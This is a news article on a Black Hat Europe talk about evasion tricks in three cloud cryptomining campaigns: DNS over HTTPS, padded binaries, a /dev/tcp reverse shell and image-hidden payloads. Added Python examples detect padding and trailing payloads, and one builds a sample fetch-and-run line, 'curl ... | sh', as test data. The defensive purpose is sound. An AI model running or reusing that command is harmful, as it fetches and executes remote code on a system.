3 Ways Attackers Bypass Cloud Security

Published: 23/11/2024   Category: security




At Black Hat Europe, a security researcher details the main evasion techniques attackers are currently using in the cloud.



BLACK HAT EUROPE 2022 – London – CoinStomp. Watchdog. Denonia.
These cyberattack campaigns are among the most prolific threats targeting cloud systems today, and their ability to evade detection should serve as a cautionary tale of threats to come, a security researcher detailed here today.
"Recent cloud-focused malware campaigns have demonstrated that adversary groups have intimate knowledge of cloud technologies and their security mechanisms. And not only that, they are using that to their advantage," said Matt Muir, threat intelligence engineer for Cado Security, who shared details on the three campaigns his team has studied.
While all three campaigns are about cryptomining at this point, some of their techniques could be put to more destructive use. For the most part, these and other attacks Muir's team has seen exploit misconfigured cloud settings and other customer mistakes, which means that defending against them lands largely in the cloud customer's camp, according to Muir.
"Realistically for these kinds of attacks, it has more to do with the user than the [cloud] service provider," Muir tells Dark Reading. "They are very opportunistic. The majority of attacks we see have more to do with mistakes by the cloud customer," he said.
Perhaps the most interesting development with these attacks is that they are now targeting serverless computing and containers, he said. The ease with which cloud resources can be compromised has made the cloud an easy target, he said in his presentation, "Real-World Detection Evasion Techniques in the Cloud."
Denonia malware targets AWS Lambda serverless environments in the cloud. "We believe it's the first publicly disclosed malware sample to target serverless environments," Muir said. While the campaign itself is about cryptomining, the attackers employ some advanced command-and-control methods that indicate they are well studied in cloud technology.
The Denonia attackers use DNS over HTTPS (DoH), which sends DNS queries over HTTPS to DoH-capable resolvers. That lets them hide their lookups inside ordinary encrypted web traffic, so AWS cannot see the malicious DNS queries. "It's not the first malware making use of DoH, but it certainly isn't a common occurrence," Muir said. "This prevents the malware from triggering an alert with AWS," he said.
The attackers also appear to have tossed in diversions to distract or confuse security analysts: thousands of lines of HTTP user-agent strings embedded in the binary.
"At first we thought it might be a botnet or DDoS ... but in our analysis it was not actually used by the malware and instead was a way to pad the binary in order to evade endpoint detection and response (EDR) tools and malware analysis," he said.
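A quick triage heuristic for that padding trick, as an added example that is not from the article or from Cado's analysis: extract printable runs the way `strings` does, count how many look like user-agent lines, and report what fraction of the file they occupy. The user-agent pattern, the thresholds and the sample binary are all constructed assumptions for this example.

```python
import re

# Assumed shape of a user-agent line; extend for the products you actually see.
UA_RE = re.compile(rb"^(?:Mozilla|Opera|curl|Wget|python-requests)/\S")
# Printable ASCII runs of 8+ bytes, equivalent to `strings -n 8`. Newlines break runs,
# so each padded user-agent line surfaces as its own run.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{8,}")

def printable_runs(data: bytes):
    return [m.group(0) for m in PRINTABLE_RUN.finditer(data)]

def padding_profile(data: bytes, ua_fraction_threshold: float = 0.5, min_ua: int = 100) -> dict:
    """Summarise how much of a file is user-agent-looking text.
    Thresholds are assumptions: a real binary rarely devotes half its bytes to UA strings."""
    runs = printable_runs(data)
    ua_runs = [r for r in runs if UA_RE.match(r)]
    total = max(len(data), 1)
    string_bytes = sum(len(r) for r in runs)
    ua_bytes = sum(len(r) for r in ua_runs)
    return {
        "size": len(data),
        "string_fraction": string_bytes / total,
        "ua_count": len(ua_runs),
        "ua_fraction": ua_bytes / total,
        "likely_padded": len(ua_runs) >= min_ua and ua_bytes / total >= ua_fraction_threshold,
    }

def make_sample(n_ua: int) -> bytes:
    """Constructed stand-in for a padded binary: a fake ELF prefix followed by n_ua
    user-agent lines. Not a real sample."""
    fake_code = b"\x7fELF" + bytes(range(256)) * 4
    pad = b"".join(
        b"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
        b"Chrome/%d.0 Safari/537.36\n" % (90 + i % 20)
        for i in range(n_ua)
    )
    return fake_code + pad

if __name__ == "__main__":
    for n in (0, 500):
        p = padding_profile(make_sample(n))
        print(n, "UA lines ->", p)
```

The same idea in one line against a real file is `strings -n 8 sample | grep -c '^Mozilla/'`; the point of the profile is to compare that count with file size so a legitimately large browser library, which also contains user-agent text, does not trip the check.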
CoinStomp is cloud-native malware targeting cloud security providers in Asia for cryptojacking purposes. Its main modus operandi is timestamp manipulation as an anti-forensics technique, along with removing system cryptographic policies. It also uses a C2 family based on a /dev/tcp reverse shell to blend into the Unix environments of cloud systems.
Watchdog, meanwhile, has been around since 2019 and is one of the more prominent cloud-focused threat groups, Muir noted. "They are opportunistic in exploiting cloud misconfiguration, [detecting those mistakes] by mass scanning."
The attackers also rely on old-school steganography to evade detection, hiding their malware behind image files.
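One common way of "hiding behind an image" is simply appending the payload after the image's end marker, where viewers ignore it. The added example below (not from the article or from any Watchdog sample analysis) builds a constructed PNG and JPEG with a trailing payload and then recovers it by parsing the container to its real end marker rather than searching for the last marker byte, which an attacker could plant inside the payload. Real bit-level steganography (LSB encoding in pixel data) would not be found by this check.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack("!I", len(data)) + ctype + data + struct.pack("!I", crc)

def make_png(payload: bytes = b"") -> bytes:
    """Constructed 1x1 grayscale PNG with an optional payload appended after IEND."""
    ihdr = struct.pack("!IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # width, height, depth, colour type...
    idat = zlib.compress(b"\x00\x00")                      # filter byte + one pixel
    return (PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat)
            + _png_chunk(b"IEND", b"") + payload)

def make_jpeg(payload: bytes = b"") -> bytes:
    """Constructed JPEG skeleton: SOI, APP0, SOS, two scan bytes, EOI, then payload.
    Enough structure for the parser below; not a decodable picture."""
    app0 = b"\xff\xe0" + struct.pack("!H", 2 + 4) + b"JFIF"
    sos = b"\xff\xda" + struct.pack("!H", 2 + 1) + b"\x01"
    return b"\xff\xd8" + app0 + sos + b"\x12\x34" + b"\xff\xd9" + payload

def image_end(data: bytes) -> int:
    """Offset just past the image's own end marker, found by walking the container."""
    if data.startswith(PNG_SIG):
        pos = 8
        while pos + 8 <= len(data):
            length, = struct.unpack("!I", data[pos:pos + 4])
            ctype = data[pos + 4:pos + 8]
            pos += 12 + length                    # length + type + data + crc
            if ctype == b"IEND":
                return pos
        return len(data)                          # no IEND: treat as no trailer
    if data.startswith(b"\xff\xd8"):
        pos = 2
        while pos + 4 <= len(data) and data[pos] == 0xFF:
            marker = data[pos + 1]
            if marker == 0x01 or 0xD0 <= marker <= 0xD8:   # stand-alone markers
                pos += 2
                continue
            length, = struct.unpack("!H", data[pos + 2:pos + 4])
            pos += 2 + length
            if marker == 0xDA:                    # SOS: scan data runs until the first EOI
                eoi = data.find(b"\xff\xd9", pos)
                return len(data) if eoi < 0 else eoi + 2
        return len(data)
    return len(data)

def trailing_payload(data: bytes) -> bytes:
    """Bytes after the image proper; non-empty means something is riding along."""
    return data[image_end(data):]

if __name__ == "__main__":
    dropper = b"#!/bin/sh\ncurl -s http://203.0.113.9/x | sh\n"   # constructed, TEST-NET
    print(trailing_payload(make_png(dropper)))
    print(trailing_payload(make_jpeg(dropper)))
```

Because the parser stops at the structural end marker, a payload that itself contains `FF D9` or a fake IEND is still recovered whole; a detection that only checks "does the file end with the marker" would be fooled by an attacker who appends those bytes after the payload.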
"We're at an interesting point in cloud malware research," Muir concluded. "Campaigns still are lacking somewhat in technicality, which is good news for defenders."
But there's more to come: threat actors are becoming more sophisticated and likely will move from cryptomining to more damaging attacks, according to Muir.
